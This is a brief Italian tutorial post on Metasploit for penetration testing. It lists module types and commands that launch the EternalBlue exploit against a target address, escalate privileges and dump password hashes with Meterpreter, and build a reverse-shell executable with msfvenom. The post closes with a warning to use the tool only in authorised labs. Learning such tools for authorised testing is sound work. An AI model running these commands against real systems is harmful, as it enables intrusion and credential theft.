Metasploit e lo strumento di exploitation piu conosciuto nel penetration testing.
Architettura
- Exploit - codice che sfrutta vulnerabilita
- Payload - codice eseguito dopo exploit
- Auxiliary - scanner e fuzzer
- Post - moduli post-exploitation
Comandi base
sudo service postgresql start
sudo msfconsole
search eternalblue
use exploit/windows/smb/ms17_010_eternalblue
show options
set RHOSTS 192.168.1.10
exploitMeterpreter
meterpreter > sysinfo
meterpreter > getuid
meterpreter > getsystem
meterpreter > hashdump
meterpreter > shellmsfvenom
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=4444 -f exe > shell.exeAvviso: Usa Metasploit SOLO in ambienti lab autorizzati.
Conclusione
Metasploit richiede solide basi. Impara prima le vulnerabilita manualmente, poi automatizza.
💬 Commenti (0)
Nessun commento ancora. Sii il primo!